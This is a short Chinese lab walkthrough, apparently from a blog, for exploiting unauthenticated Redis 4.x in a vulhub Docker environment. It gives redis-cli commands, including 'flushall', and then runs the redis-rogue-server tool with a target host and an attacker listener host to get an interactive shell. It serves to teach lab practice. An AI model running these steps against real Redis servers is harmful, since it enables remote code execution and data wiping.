赞
踩
靶场IP:192.168.30.138
kali的IP:192.168.30.129
进入目录:cd/vulhub-master/redis/4-unacc
启动:docker-compose up-d
检查:docker-compose ps
vi docker-compose.yml //查看端口和版本号
开启成功
在kali上安装redis进行服务链接
#安装redis apt-get install redis #redis使用 redis-cli -h 192.168.30.137 -p 6379 #redis常见命令 (1)查看信息:info (2)删除所有数据库内容:flushall (3)刷新数据库:flushdb(3) (4)看所有键:KEYS *,使用select num可以查看键值数据: (5)设置变量:set test"whoami" (6)config set dir dirpath 设置路径等配置 (7)config get dir/dbfilename 获取路径及数据配置信息 (8)save保存 (9)get 变量,查看变量名称
步骤三:可以直接连接执行命令且不需要认证说明存在未授权访问漏洞----->下载以下攻击项目…
https://github.com/n0b0dyCN/redis-rogue-server
可以下载git源码或者压缩包
git clone https://github.com/n0b0dyCN/redis-rogue-server.git
步骤四:使用工具执行以下命令获取目标的命令执行环境,交互时输入i键会获取Shell环境
python3 redis-rogue-server.py --rhost 192.168.30.138 --lhost 192.168.30.129
然后就可以输入命令获取信息了
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。